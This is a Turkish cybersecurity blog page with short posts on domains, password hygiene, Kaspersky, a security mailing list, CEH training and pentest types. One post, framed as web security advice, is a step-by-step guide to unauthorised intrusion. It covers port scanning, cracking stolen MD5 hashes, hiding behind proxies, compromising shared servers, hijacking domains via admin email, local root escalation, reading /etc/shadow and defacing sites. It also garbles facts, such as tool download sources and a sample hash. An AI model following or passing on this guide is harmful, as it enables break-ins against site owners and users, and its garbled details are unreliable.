HACKİNG VE SİSTEM GÜVENLİĞİ

'App' Uzantılı Siteler Geliyor!

  • 2.5.2018 17:07:39
  • 0 Yorum
  • 365

Google "app" uzantılı siteler ile geliyor.Google’ın ” .app ” alan adı uzantısına sahip olabilmek için 25 milyon dolar ödemesinin üzerinden üç yıl geçerken, nihayet bu uzantı kullanıma sunuluyor.Yine web sitesi erişi kayıtlarına da google şirketi üzerinden kolaylıkla ulaşabilmeniz de mümkün.Ayrıca google belirlemiş olduğu takvime göre 8 mayıs tarihinden itibaren bunları kayıtlı kullanıcılarına da dağıtmış olacağını da belirtiyor.


Üst seviye alan adları kategorisinde yer alan bu uzantı, akıllarda uygulamaları çağrıştırması nedeniyle yıllardır talep ediliyordu. Uygulama geliştiricileri ve diğer teknoloji şirketlerin alan adlarını kayıt etmek için şimdiden sıraya girdiği .app uzantısı ” .com ” alan adlarına kıyasla hatırlanması kolay bir alternatif.Tabi bu uzantıları da kullanmanın belli şartları var bunlar onların "app" uzantılarını desteklemelerini amaçlıyor diyebilmemiz de mümkün hale geliyor.Özellikle güvenlik bakımızdan ise HTTPS kullnacaklaklarını da ifade ediyorlar.


 Bu zorunluluk ile genellikle uygulama sayfalarından oluşması beklenilen .app uzantılı sitelerin, kötü amaçlı yazılımlara, internet servis sağlayıcılarının girişimlerine ve açık Wi-Fi ağlarında casusluğa karşı korunması sağlanacak.Böylece artık bir siteye saldırı gerçekleştirecek olmakta öyle kolay değil.Tüm uygulama sitelerini bu yollar ile korumayı planlıyor.

Sinem Özdemir

Geleceğin En İyi Hackerlerini Yetiştiriyoruz!

  • 11.4.2018 13:05:37
  • 0 Yorum
  • 269

Ankara Çankaya’daki BİLSEM eğitim kurumunun desteği ile siber alanda yetiştirilmek üzere daha küçük yaşlardan başlayarak  12 çocuk yazılım, robotik kodlama, siber

güvenlik gibi konularda eğitim alıyor. 

İdealist öğretmen Saygın Özgür Öztunç, 3 yıl önce Ankara Çankaya Yasemin Karakaya Bilim ve Sanat Merkezi’nde (BİLSEM) çocuklar için bir siber güvenlik eğitim programı geliştirdi ve “beyaz şapkalı hacker” projesi başlattı.Belli bir aşama kaydederek bir çok çocuğumuza bu konularda oldukça iyi olabilmeleri açısından çeşitli eğitimler kapsamında daha iyi işler başarabilmeleri açısından sürekli takip ettik ve onların her ilerlemesini kaydetmeye çalıştık diyerek , “Atölyeye 40 öğrenci ile başladık. İçlerinde iyi olanlarla devam ettik. Öğrencilerimizle aile gibi olduk. Yaşları küçük olmasına rağmen büyük başarılara imza atıyorlar” dedi.

 


 

 Bunun ülkemizde hızlı bir biçimde yayılmasını sağlayarak siber  sistemler konusunda en iyisini yapabilmeyi istediklerini de konuşmlarında ifade ederek 
Her çocuğu uzun süre araştırdığını ve atölyeye dahil olmaları için ikna ettiğini belirten Öztunç, “Uzun yıllar hayalini kurduğum bir atölyeydi. Biz burada ilk önce sanal ortamda gerçekleşen olumsuz davranışları öğreterek ne ile mücadele edeceklerini gösteriyoruz. Sanal âlemde ince bir çizgi var. Sürekli kontrol altında çalışıyor ve etik değerler üzerinde sıkça duruyoruz. Biz kapüşonlu, karanlık hacker’lar değil beyaz hacker’lar yetiştiriyoruz. Bir binaya nereden, nasıl girileceğini en iyi hırsızlar bilir. Biz de siyahlar gibi düşünüp onların yapacağı atakları bilip ona göre önlem alıyoruz, almalıyız. Uygulamayı Türkiye geneline yaymayı ve Milli Eğitim Bakanlığı’nın desteğiyle genç, başarılı, beyaz hacker’lar yetiştirmeyi hedefliyoruz” diyerek bu konuda gençlerin hızlı bir ilerleme kaydeebilmeleri açısından ellerinden gelenin en iyisini yapacaklarını da ifadelerinde kullanmayı geciktirmedi.

 

Yararlı alanlarda yetiştirilecek yani beyaz yakalı olan çocukların bu alanda daha hızlı ilerlemleri için yüz tanıma sistemleri bve insan modellemelerinden tutun güvenlik konusunda yapılabilecek her durum için hazır bir biçimde yaetiştirleceklerini de ifadesinde belirtmeyi ihmal etmedi.Görünen o ki gelecek yıllar içerisinde türkiye siber güvenlik açısından en iyilerini yetiştirerek savunma sistemlerinde tüm bu sanal hizmetleri kullanabilmeyi de amaçlamaya çalışıyor.

 

Sinem Özdemir

Mailchimp Kripto Sanal Paraları Yasaklıyor!

  • 2.4.2018 17:41:21
  • 0 Yorum
  • 258

Mailchimp, blok zinciri ve kripto paralarla ilgili e-posta gönderen hesapları kapatacağını duyurdu. 
 
“Kabul Edilebilir Kullanım Politikası’nı güncelleyen şirket, kripto paraların satışına, değişimine, pazarlanmasına ve üretimine dair tüm e-postaların platformunda yasaklandı.
 
Kötü niyetli kişiler bu hesapları kullanarak insanları kandırabiliyor ve topladıkları paralarla kaçabiliyorlar. Bu hamle doğru bir adım gibi görünsede bir çok kullanıcı ne yazıkki bu durumdan oldukça rahatsız ve şikayetçi  olduğunu da dile getirmiş oldu.


 
Mailchimp,politikasını bir hayli değiştirmiş olduğu   "Kripto paralara dair tanıtım kampanyaları günümüzde çoğunlukla dolandırıcılıkla ilişkilendiriliyor. Politikamızda yaptığımız güncellemenin, kripto paralar ve blok zincirine dair tartışmaları engellemediğini hatırlatmak isteriz." dedi.

Sinem Özdemir

Güvenli Şifre Oluşturmak İçin

  • 24.11.2017 13:13:32
  • 0 Yorum
  • 314

Gelişen teknolojinin hayatımıza kattığı yeniliklerden biri de birçok şeyin dijital ortama taşınmasıdır. Bunun sonucunda ortaya çıkan güvenlik sorunlarına karşı alınacak önlemlerin başında ise; giriş yaparken kullanılan şifrelerin güvenli hale getirilmesi gelmektedir. Oluşturulan şifrenin güvenli şifre olduğundan bahsedebilmek için; sadece kullanıcı tarafından bilinmesi ve başkaları tarafından tahmin edilmesinin zor olması gerekmektedir. Kolayca hatırlanabileceği gibi başkalarının tahmin etmesi mümkün olmayan şifrelerin belirlenmesi dijital ortamlardaki güvenliğin sağlanması için son derece önemlidir.

Güvenli Şifre Oluşturmak İçin Nelere Dikkat Edilmelidir?

Dijital ortamlara giriş yaparken kullanılacak şifrelerin oluşturulmasında; ad soyad, yaşanan il, doğum tarihi, anne kızlık soyadı, kullanıcı adı, alfabetik olarak sıralı harfler, sıralı sayılar, eş, çocuk ya da sevgili ismi, tutulan takım gibi kişilerle ilgili bilgilerin kullanılmaması gerekir. Kişilerin kendileri ile ilgili bilgileri şifre olarak belirlemeleri durumunda tahmin edilmesi kolay bir şifre ortaya çıkacak ve güvenlikten bahsetmek de söz konusu olmayacaktır.

Güvenli bir şifrenin en az 8 karakterden oluşması gerekmektedir. En az 8 karakterli bir şifre güvenlik seviyesini arttırdığı gibi daha fazla karakter içermesi durumunda; lamerlar tarafından şifre kırma programları aracılığıyla çözülmesi çok daha fazla zaman alacaktır.

Şifrelerin güvenli olmasında, büyük ve küçük harflerin bir arada kullanılması ve beraberinde sayısal ve özel karakterlerin de olması tercih edilmektedir. Şifre kırma işlemlerinde, alternatiflerin artması nedeniyle denenmesi gereken kombinasyonlar da artacak ve bu tarz şifrelerin çözülmesi çok daha zor ve çok daha uzun zaman alıcı bir işlem haline gelecektir. @, €, $, #, £, é, %, [, {, \, ], } gibi özel karakterler Alt Gr tuşu veya shift tuşları ile aynı anda rakam tuşlarına basılması sonucu yazılabilmektedir.

Herkesin kullandığı Password12, Parola123 veya 123456 gibi şifreler en kolay tahmin edilen şifreler olması nedeniyle kesinlikle kullanılmamalıdır. Dünya üzerinde en çok kullanılan şifrelerin bunlar ve doğum tarihinden oluşan şifreler olduğu bilinmektedir. Kötü niyetli bir kişinin dijital ortamda bulunan bir hesabı ele geçirmek için deneyeceği ilk şifreler bu tür şifreler olacaktır.

Bazı internet sitelerinde, şifre oluşturma sırasında şifrenin güvenlik seviyesi zayıf, orta ve güçlü gibi ibarelerle gösterilmektedir. Şifre oluşturma işleminde, bu tür uyarıların dikkate alınması ve güvenli şifre olduğu görülen şifrelerin tercih edilmesi dijital güvenlik açısından önem taşıyan konular arasındadır.
Güvenli bir şifre oluşturmak isteyen kişilere verilen öneriler arasında, şifrenin anlamsız bir şekilde oluşturulması da yer almaktadır. Güvenli bir şifre için birkaç örnek vermek gerekirse; “net6$bu48#” ya da “hey&biz4£” şeklinde karmaşık rakam, harf ve özel işaretlerden oluşan şifreler güvenli şifreler olarak gösterilebilir.

Özellikle internet bankacılığı, kredi kartı bilgilerinin girilerek alışveriş yapılan siteler ve kişisel bilgilerin paylaşıldığı sitelerde güvenli şifrelerin önemi bir kat daha artmaktadır. Şifre güvenliğinden emin olmak için, bu amaçla hazırlanan siteler üzerinden şifrenin kontrol edilmesi mümkün olabilmektedir.

Güvenli Şifre Oluşturmanın Kolay Yolu: Password Generator

Şifre oluşturma sırasında güvenliğinden emin olamıyorsanız Password Generator olarak adlandırılan; websiteleri ya da programlar aracılığıyla güvenli şifreler oluşturabilirsiniz. Bu tip programlar rastgele, karmaşık harf,rakam ve özel karakterlerden oluşan şifreler yaratırlar.

Eğer çok fazla sayıda şifre kullanmanızı gerektiren bir işiniz varsa şifreleri aklınızda tutmanız imkansızdır. Bir yere not almanız da şifrenin bütün güvenilirliğini riske atacak bir hareket olur. Bu sebeple KeePass gibi bütün şifrelerinizi veri tabanında güvenli şekilde saklayan programlar kullanmanız tavsiye ederiz.

kaynak:seoturka

Kaspersky İnkar Etti

  • 9.11.2017 11:17:54
  • 0 Yorum
  • 309

Kaspersky Lab'ın kurucusu Eugene Kaspersky, daha önce verdiği bir röportajda tehdit görülen tüm dosyaların kayıt edildiğini söylemişti fakat geçtiğimiz günlerde bunu inkar ederek, rus istihbaratı ile bir ilişkileri olmadığını söyledi.

Kaspersky'nin Rus hükümetiyle işbirliği içinde olduğuna dair iddiaları bastırma çabaları, herkesi ikna etmiş değil. Reuters'a göre kurucu Eugene Kaspersky verdiği röportajda firmasının yazılımının "direkt tehdit" olarak işaretlenmemiş dosyaları kopyaladığını söyledi. Ancak Kaspersky, daha sonraki bir açıklamasında Reuters'ın makalesinin doğru olmadığını söyledi.
Reuters'ın kaynakları, Kaspersky'nin yazılımının bir defasında şüpheli bir hacker'ın bilgisayarındaki fotoğrafını ele geçirdiğini ileri sürse de CEO, bu iddiayı da kabul etmedi. Kaspersky, hacker'lara yardımcı olmamak için çok spesifik konular hakkında konuşmamayı tercih etti.
Bunlar, firmanın özel NSA dosyalarını elinde tutmuş olmasını etkilemiyor. Yine de yaşanmış olanları normal olarak nitelendirmek zor çünkü antivirüs yazılımları, genellikle sadece riskli dosyaları hedefliyor.

kaynak:chip

Netsec Ağ Ve Bilgi Güvenliği

  • 26.9.2017 15:08:07
  • 0 Yorum
  • 333

Netsec Ağ ve Bilgi Güvenliği Topluluğu 2006 yılında Türkiye’deki bilişim güvenliği çalışmalarına destek vermek amacıyla kurulmuş gönüllü bir e-posta topluluğudur.

Türkiye’de sistem, ağ ve güvenlik birimlerinde çalışan bilişimcilere yönelik hizmet veren Türkiye’nin en geniş katılımlı e-posta listesidir. Listenin amacı, benzer pozisyonlarda çalışan bilişimciler arasında bilgi paylaşımını artırmak ve güvenlik konusunda referans kaynaklar oluşturmaktır.

Ag ve güvenlik amaçlı kullanılabilecek her tür ticari ve açık kaynak kodlu yazılımının tanıtımının yapılması (kuru reklama kesinlikle izin verilmeyecektir) serbesttir. Böylece farklı ürünleri kullanan bilişim profesyonellerine alternatif ürünleri tanıtma fırsatı verilmiş olacaktır.

E-posta hizmetinin yanı sıra 2010 yılı itibariyle Ankara ve İstanbul’da düzenli etkinlikler gerçekleştiren profesyonel bir topluluk haline gelmiştir.

Netsec, Türkiye’de sistem, ağ ve güvenlik birimlerinde çalışan bilişimcilere yönelik hizmet veren Türkiye’nin en geniş katılımlı e-posta listesidir.
Bu e-posta grubunda ülkemizin önde gelen kurum ve kuruluşlarında çalışan siber güvenlik uzmanları, bilişim avukatları, IT yöneticileri, ilgili birimlerdeki yetkili merciler ve şirketlerin bilgi işlem birimlerindeki kişlerden oluşmaktadır.

Listenin içeriği aşağıdaki konuları kapsamaktadır:

Güvenlik Duvarlari
Saldiri Tespit ve Engelleme Sistemleri
Kablosuz Aglarda Guvenlik
Yerel Aglarda Guvenlik
Web Uygulama Guvenligi
VPN Uygulamalari
Trafik Analizi
Adli Bilişim Analizi
Tuzak Sistemler
Linux/UNIX/Windows isletim sistemlerinde Guvenlik
Liste ek olarak Türkçe yayınlanmış belgelerin duyurulması, yeni çıkan güvenlik içerikli yazılımların, makalelerin, etkinliklerin veya ücretsiz eğitim duyurularının paylaşılması amacıyla da kullanılmaktadır.

Listeye Üye Olmak İçin: uyelik@netsectr.org adresine boş bir e-posta gönderilmesi yeterlidir.
Listemize yapılacak olan etkinlik tanıtımı için etkinlik sayfanıza aşağıdaki logoyu ve bağlantıyı ekleyerek destekleyenler arasında göstermeniz gereklidir.

netsec logo

www.netsectr.org
Liste Hakkında Bazı Bilgiler:

Listeye gönderileceketkinlik duyurularında NetSec topluluğunun destekleyenler kısmına eklenmesi beklenmektedir.
Listeye “Ticari Duyuru” mailleri gönderilmesi yasaktır.
Listede konuşulan tüm konular Google ve diğer arama motoru arşivlerine girmektedir ve arşivlerden silme imkanı bulunmamaktadır.
Listeye gönderilen tüm mesajlar moderasyondan geçmektedir, 5651 sayılı kanuna göre liste sahiplerini zor durumda bırakacak mailler(hakaret vs), spam/reklam mailleri ve güvenlikle ilgili olmayan mailler onaylanmamaktadır.
Siyasi ve ayrımcılık içeren mesajlar onaylanmamaktadır.
Doğrudan üye olup duyuru göndermek isteyen üyelerimizin mesajları yayınlanmayacaktır.
Aynı içerikte bir duyuru bir ay içerisinde bir kere gönderilebilir.
Gönderdiğiniz e-postalar listeye gitmiyorsa bunun sebepleri aşağıdaki maddelerden biri olabilir:

Gönderilen e-posta liste içeriğiyle alakalı değildir
Günderilen e-posta spam filtreleme sistemine takılmıştır
Gönderilen e-posta “reklam” içermektedir. (Teknik ifadelerle desteklenmiş ürün duyuruları, önerilerine izin verilmektedir.)
Hakaret içeren e-postalar
+1, destekliyorum gibi gereksiz e-postalar
Tamamı büyük harfle yazılmış e-postalar.

Ceh Sertifikası Ve Sisetm Güvenliği

  • 3.3.2017 14:48:13
  • 0 Yorum
  • 578

Siber saldırıların ve tehditlerin sayısı her geçen gün artarken, kuruluşların internete bağlı çalışan sistemlerinin ve iş süreçlerinin de sayısı aynı hızla fazlalaşmaktadır.   

Ağ ve sistemlerin güvenliğinin sağlanması için alınması gereken tedbirlerin belirlenmesi ve bunun devamında güvenli ağ mimarisine kavuşmak için yapılması gerekenlerin tespit edilmesi, proaktif siber güvenlik teknikleriyle mümkündür.   

Sızma testi olarak da bilinen çalışmalar; kuruluş ağ ve sistemlerinin mevcut güvenlik seviyesinin ölçülmesini sağlayan tek çalışma olduğu için kuruluşların siber güvenlik seviyesinin korunması ve risk analizinin yapılmasına olanak vermektedir.   

Eğitimin amacı; sistem ve ağ uzmanlarını, küçük ve orta ölçekli işletmelerde IT operasyonlarını mümkün olduğunca güvenli bir şekilde yürütmelerini sağlayacak bilgi ve donanıma kavuşturmak ve kariyerlerini bilgi güvenliği ve siber güvenlik üzerine kurmak isteyen bilişim profesyonelleri için bir başlangıç noktası oluşturmaktır.

Eğitim kapsamında 'Hacker' olarak da adlandırılan siber saldırganların hedeflerini belirlerken; kullandıkları teknikler, hedef sistem üzerindeki zafiyetleri tespit etmek için kullandıkları araçlar, sistemleri ele geçirmek için kullanılan istismar kodları ve web uygulamalarına yönelik saldırılar da ele alınacaktır.

Siber Güvenlik Uzmanlığı ve Ethical Hacking Esasları eğitmi, CEH sertifikasyon eğitimi öncesinde katılımcılara güvenlik farkındalığı ile birlikte  EC-Council CEH sertfikasyon eğitimine ve sınavına hazırlık sağlamaktadır.? 

Ekran Sorunu v9.10 Üzerinde Çözünürlük Problemi İçin Önerileriniz Nelerdir?

  • 3.3.2017 14:37:14
  • 1 Yorum
  • 500

Sayı : Ekran tercihleri ??"Bilinmeyen Monitör" gösterir ve çözünürlüğü 800x600'un üstünde artıramam. 

Sistem ve Donanım ayrıntıları : 
Ubuntu: v9.10 
Anakart: Asus P5KPL-AM / PS 
Display Driver: Intel Corporation, 82G33 / G31 Express Tümleşik Grafik Denetleyici [8086: 29c2] (10 rev) 

Detaylar : i kullanıyorum çözünürlük çok küçük. Çözünürlüğü artırmak istiyorum. "Monitörleri Algıla" yı tıkladığımda "bilinmeyen Monitör" de gösteriliyor; ayrıca çözünürlük 800x600 ile sınırlandırılmıştır. 

Ben Linux'u ilk kez kullanıyorum. Harika işletim sistemi için Ubuntu ekibine teşekkür ederiz. Lütfen ne yapmam gerektiğini bildirin. "Linux için intel G33 sürücüsü", "Bilinmeyen Monitör" Ubuntu / Google webiste üzerinde ama doğru çözümü bulamadı inanıyoruz. 

Ubuntu v9.10 zaten bir Intel G33 ekran sürücüsü sağladığını düşünüyorum, çünkü bir şey indirip / yüklüyordum ve "Hata: daha sonraki sürüm zaten yüklendi" dedi. 

Step / by / step prosedürü sağlamak için bir şey indirip yüklemem gerekiyorsa. Çünkü ben henüz nereden / nasıl make / derleme kodunu yükleyeceğimi anlayamıyorum. Indirilen dosyaların nereye yerleştirileceğini vs.. Teşekkürler 

 

Penetrasyon Testinde İmajını Belirle

  • 3.3.2017 14:15:53
  • 0 Yorum
  • 407

Kısaca Pentest diyebilirsiniz. Penetrasyon testi; firmaların bilişim sistemlerini oluşturan ağ altyapılarını, donanım, yazılım ve uygulamalara kötü niyetli birinin (hackerın) saldırmasını öngören yöntemler kullanılarak yapılan saldırı ve müdahaleler ile güvenlik açıklarının tespit edilip bu açıklarla sisteme sızılmaya çalışılmasının simüle edilmesi ve tüm bu işlemlerin raporlanmasıdır.

Test sırasında uzmanlar tıpkı bir saldırgan gibi hareket eder ve sistemin tüm açıklarını, riskleri ve erişilebilirliği ortaya çıkarırlar. Çok farklı yöntemler ve değişkenler söz konusu olduğundan uzmanlar tarafından gerçekleştirilmesi gerekmektedir.

Penetrasyon Testlerinin Çeşitleri
White Box, Black Box ve Gray Box olmak üzere üç çeşittir.

White Box (Beyaz Kutu) Penetrasyon Testi

Güvenlik uzmanı, firma içinde yetkili kişilerce bilgilendirilir ve firma hakkındaki tüm sistemler hakkında bilgi sahibi olur. Bu yöntemde daha önce firmada yer almış, hala çalışmakta olan veya misafir olarak ağa sonradan dahil olan kişilerin sistemlere verebilecekleri zararlar gözetilir ve raporlanır.

Black Box (Siyah Kutu) Penetrasyon Testi

Bu yöntemde sızma testini gerçekleştiren firmayla herhangi bir bilgi paylaşımında bulunulmaz sadece hedef verilir.. Bilgi sızdırmak yada zarar vermek amacıyla sızmaya çalışan bir hacker gibi davranılarak verilebilecek zararlar gözetilir ve raporlanır.

Gray Box (Gri Kutu) Penetrasyon Testi

White Box ile Black Box testlerini kapsayan yani hem içeriden hem dışarıdan olarak yapılan test diye tanımlayabiliriz. Gray Box'ta ek olarak Sosyal Mühendislik Saldırıları ve Kablosuz Ağ Saldırıları da eklenmektedir.

Web Yazılımlar İçin Güvenlik Önlemleri

  • 28.2.2017 13:38:54
  • 0 Yorum
  • 396

Yıllar önce bir blog’umda yazdığım bir yazı dizim baktım ki bütün hack forumlarında yayınlanmış ve herkes “ben yaptım” rolünde koşuşturuyor. Taklitlerden kaçının! Tasarladığım çoğu siteye her gün yüzlere varan saldırılar yapılmıştır fakat bugüne kadar hack yapabilen olmamıştır. Anlayacağınız üzere en iyi korunma yöntemi, saldırı yöntemlerini deneyerek!

Aşağıda açıkladığım yöntemleri deneyerek tasarladığınız sitelerin güvenlik açıklarını bulabilir ve ona göre yama geliştirebilirsiniz. Amacım güvenlik kriterlerini öğretebilmek; Hack öğretmek değil bunu belirtmek isterim.

ÖNEMLİ TCP PORT NUMARALARI VE GÖREVLERİ 
7 => echo, Bu porttan sunucuya ne yollarsanız aynen geri yollar.
9 => discard, Dev/Null.
11 => systat, Kullanıcılar hakkında bilgiler verir.
13 => dCahil teamime, Tarih ve zaman bilgisi. Bilgisayarın nerede olduğu bulunabilir.
15 => netstat, Network ile ilgili bilgiler.
19 => chargen, Sistemde kullanılan ASCII karakterler.
21 => ftp, Bildi iniz ftp portu.
23 => telnet, Telnet portu.
25 => smtp, Smtp (Simple Mail Transfer Protocol) Server portu.
37 => time, Zaman.
39 => rlp, Resource Location.
43 => whois, Host hakkında bilgiler.
53 => dns, Domain name server.
79 => finger, Kullanıcılar hakkında bilgi.
80 => http, Web sunucu.
110 => pop, Gelen mail.
119 => nntp, News Group.
443 => shttp, Güvenli web sunucu.
Bize gerekli olacak önemli portlar bunlar bu yüzden size liste hazırladım. Şimdi asıl işimize geçelim. İzinsiz gişirim (Hack) yaparken bize elbette bazı programlar lazım olacak bunları sizlerle kısa açıklamalar yaparak paylaşacağım.

İlk olarak http://www.insecure.org/nmap adresinden NMAP programını indielim.Sitede programın windows ve Linux için ayrı versiyonları mevcut size uygun olanını listeden seçip download edebilirsiniz.Bu program bizi port tarama derdinden kurtaran harika bir programdır.Mantığını açıklamak gerekirse şöyle diyebilirim: Hostun veri giriş çıkışı yaptığı, sık kullanılan portları ve bu portlar üzerinde veri giriş çıkışı yapan programların bir listesini bize sıralayan bir programdır.Biz bu portlar üzerinde çalışan bir programın açığını kullanıp sisteme sızabiliriz.

Eğer hostun kullandığı sistem Windows ise Administrator, Linux ise Root olabiliriz.Administrator ve Root bir sistemdeki en yetkili kişidir.
İkinci programımız ise NESSUS. Bu programın kullanımı zordur. Kullandıkça tecrübe kazanırsınız.Programın çalışma mantı ı şöyle: NASL (Nessus Attack Scripting Language) dili ile özel script saldırıları yapmaya yarar.Bize önemli güvenlik açıklarını bularak gösterir.Programı; http://www.oxid.it adresinden indirebilirsiniz.
Üçüncü programımız da çoğunuzun adını duyduğu Md5Cracker adlı Md5 crack programı.Bu programla kriptolu şifreleri (Md5-base 64) çözebiliriz. Bu tip şifreler sıklıkla forum database lerinde bulunur örneğin “aeH19a85ZlokBN68A6d51mmT5e808aa2w03aVkuz4 ” şeklindeki bir md5 şifreyi çözebiliriz. Md5 şifrleme phpbb, vbulletin, phpnuke tarzı forum ve portalların database inde user tablosu içindeki listede kullanıcı adına karşılık gelen criptolu şifredir.John dışında daha pek çok md5 cracker mevcut fakat en ünlüsü ve hızlısı bu olduğu için bunu seçtim.Md5Crack kırdığı şifreleri Programı kurdu unuz dizinde “pass.txt” adında birmetin dosyası oluşturur. Şifreleri bu dosyadan alabilirsiniz.Yada ekrandan görebilirsiniz.Fakat bu işlem saatleri alıyor bunu da belirteyim.Yani sabırlı olmanız şart.Program linki aşağıda.

Md5Cracker Programı : http://rapidshare.com/files/167942315/md5.rar.html (şifre yoktur)

security_by_lukeroberts

Bunların dışında önemli bir yöntem olarak siteye ftp, telnet, ssh (shell) gibi yollarla bağlanmayı deneyerek sistemin kullandı ı programları öğrenmektir.Arkadaşlar sizlere önemli bir tavsiyem kesinlikle denemekten kaçınmamanız deneme yanılma yöntemiyle ö renilen her şey çok daha kalıcı oluyor.43 saat süren hack deneyimlerim oldu.Şunuda unutmayın hiç bir sistem %100 güvenli de ildir, mutlaka bir açık mevcuttur. İşte o açığı bulmak bizim görevimiz. Bu arada kendi güvenli iniz için sabit bir ip numarası kullanmaktan kaçının.Unutmayın ki ip adresi sizin açık bir kimli inizdir. Sürekli de işen yada size ait olmayan ip adresleri kullanın. Bunun için ise Proxy dediğimiz sistemler vardır. www.atomintersoft.com bunlardan birisi. Sizde Google da proxy aratarak bulabilirsiniz. Bunu dışında sürekli ip Steganos Internet Anonymous programı yada Permeo Security Driver programını kullanabilirsiniz.

Host hakkında detaylı bilgi alabileceğimiz diğer yöntemler ise bir dos komutu olan ve hepimizin makinelerinde bulunan küçük programcıklar yani: finger ve tracert.

FINGER => Bize ilgili host üzerindeki kullanıcıları ve izin verilmişse bu kullanıcıların host üzerindeki özelliklerini verir.Tabiki bunu yapmak için öncelikle bilgi almak istediğimiz hosta 79. porttan yani finger portundan telnet bağlantısı yapıyoruz tabi açıksa. Bunun içinde Çalıştıra “telnet” yazıyoruz, bağlan kısmına “host adını” bağlantı türü kısmınada “79” yazıyoruz.

TRACERT => Bu komut ise bize hosta gönderdi imiz paketin kaç yol geçerek hosta ulaştığı hakkında bilgi verir ve routerları listeler.Buraya kadar yaptı ımız ön çalışma hostun haritalanması ve gerkli bilgilerin toplanmasıydı. Bundan sonrası sabır isteyen kısım.

Gelin şimdi sanal bir saldırı yapalım:

Örnek olarak http://www.abcdefg.com diye bir site olduğunu varsayalım. Şimdi site hakkında bilgi toplamak için www.whois.sc sitesine kayıt olalım. Daha sonra Domain Explorer bölümüne geçelim http://www.adbdefg.com yazalım. Karşımıza bazı bilgiler çıktı, bunlar host bilgileri. Bize lazım olanlar: Reverse ip, Server type, Ip adress, Name server, ICAAN Registrar. Bu bilgileri alarak bir kenara not edelim. Şimdi kısaca üstteki bilgilerin anlamlarını açıklayayım.

REVERSE IP => Bu seçenek server üzerinde çalışan diğer siteleride gösterir fakat whois.sc bize sadece 3 site görme hakkı vermektedir. Eğer silver üye olursanız tüm siteleri görebilirsiniz. Bu seçenek bizim için önemlidir çünkü; server üzerinde hacklemek istedi imiz http://www.abcdefg.com sitesi üzerinde açık yok diyelim, fakat server üzerinde çalışan başka bir sitede açık bulduk ve sitenin açığı çok, bu sitenin ftp sine erişip gerekli kodları atabilirsek serveri komple ele geçirebiliriz!!!!! Yani root yada administrator olabiliriz.
SERVER TYPE => Server tipi bizim baz aldığımız nokta olmalıdır. Mesela http://www.abcdefg.com sitesi için server tipi Apache / 1.3.31(Unix). Burdan anlayaca ınız şey: Server 80. porttan Apache 1.3.31 http serveri çalıştırıyor. Ayrıca PHP / 4.3.5 kullanıyor. Bunlar Daemon dedi imiz arka planda çalışıp serverin asıl aktivitesini yerine getiren yapılardır. İşte Exploitler yardımıyla server üzerinde kullanılan daemon veya http serverin bir açığından içeri sızabiliriz. Şimdi adı bu kadar çok geçmişken Exploitler hakkında bilgiler vermek istiyorum: Exploitler sistemin açığı üzerine yazılmış kodlardır. İçerik olarak include ve define edilmiş değişik kod kümeleri barındırırlar.Bu kodlar bizim uzun uzun u raşmamıza gerek bırakmadan bir şekilde servera gerekli komutları verdirererek çalışırlar. Exploitler root ve local olmak üzere ikiye ayrılır.

NAME SERVER => Burda yazan adres http://www.abcdefg.com için host sağlayan sitedir. Bu adrese girerek server hakkında daha çok bilgiye ulaşabiliriz. Çünkü ; çoğu host firması sitelerinde, kullandıkları makinenin özelliklerini ve üzerinde kurulu olan işletim sistemlerini, php versiyonlarını falan açıklarlar.

ICAAN REGISTRAR => Domainin kayıt edildiği site. Registrarı yani domain bilgilerini incelediğimizde bizim için önemli olan Administrative Contact yani domainin kayıtlı olduğu mail adresidir. Birde domainin kayıt edildiği registered through bölümündeki adrestir. Yani http://www.abcdefg.com domaini Registered through bölümünde yazan adres vasıtasıyla alınmış demektir. Şimdi bu bilgileri örneğin Administrative Contact bölümündeki maili hacklersek domaini ele geçirebiliriz. Sonrada domaini kendi hostumuza yönlendiririz.Yani firmaya mail atarak yada erişim paneli var ise panelden şifrenin yeniden maile gönderilmesini isteyerek admin şifresini ele geçirebiliriz. Zaten domain bizim olmuş olur artık.

hack-siyahport

Şimdi uygulama kısmına geçelim:

NMAP ı açıp nmap http://www.abcdefg.com yazdık. Nmap ısS şeklinde bir komut verebilmemiz için sitede bir firewall olmaması gerekir. Bu arada serverin tam olarak ne olduğunuda anlamış olduk: Redhat / Gnu Linux i386 üzerinde Apache 1.3.31(Unix) Web Server. Çıkan listedeki open yazan portlar açık, closed yazan portlar ise kapalıdır. Sistemde açık bir port yakalarsak hemen telnet ip adresi ve port numarası şeklinde bir dos komutu veriyoruz. Daha sonra telnet bizi serverda bir yere atar burdan sonra duruma göre hareket ederiz. Mesela bash shell’e düşersek ID mize bakıp ona göre hareket ederiz. Root olmuşsak bu porta birisi daha önce erişmiş ve kullanıma açmış demektir.Ama local user isek local root exploitler ile sistemde root olmamız gerekiyor.

Listedeki portlarla devam edelim: Bu portlar üzerinde çalışan programlardan herhangi biri üzerinde bulduğumuz bir açık bizim sisteme girmemizi sağlar. Sisteme girdikten sonra root da olabiliriz. Peki bu programların açığını nerden bilece iz diye sordunuz sanırım İşte bunun için açık olan portlardan birinin exploitini bulup derleyeceğiz. Sonrada exploit yardımıyla sisteme sızmaya çalışacağız. Bundan sonrasında ise buldu umuz exploitin türüne göre ya root yada local kullanıcı oluruz. Eğer root olursak serveri istediğimiz gibi yönetiriz. Ama local isek yani shell düşersek şunları yapabiliriz:
İlk olarak id yazarak kullanıcı durumumuzu öğreniriz. Genellikle apache yazar. Sonrada sistem yetkilerimize bakarız. Neler yapabiliyoruz, sisteme dosya yükleyebiliyormuyuz? Bunları hep deneriz. E er sisteme dosya çekebiliyorsak ve gcc compilerda çalışıyorsa o zaman uname yazarak kernel çekirdek versiyonunu ö reniriz ve buna göre local root exploit ararız. Local root exploiti bulabilirsek sisteme çeker ve gcc ile derleriz. Daha sonra ise şunları yazarak root oluruz: ./exploit_adı . bunlarıda yapamıyorsak etc/passwd ve etc/shadow dizinlerine erişip erişemediğimizi kontrol ederiz. Bunların dışında mesela http://www.abcdefg.com sitesinin dizinini bulup içerisine index.html dosyası çekilebiliyormu diye deneyebiliriz. Eğer bunu başarırsak bu iş zaten bitmiştir, yani ilgili siteye index attık demektir. Ama root olduktan sonra serverda istediğimiz her şeyi yapabiliriz.

Mysql Blind Sql İncektion İle Güvenlik Açıklarınızdan Kurtulun

  • 27.1.2017 14:26:55
  • 0 Yorum
  • 472

Bu içinde bulunduğumuz makalede Mysql Blind Sql Injection’ın ne olduğunu anlatmaya çalışacağım ve uygulama yaparak bir sitenin bazı bilgilerini ele geçireceğiz.

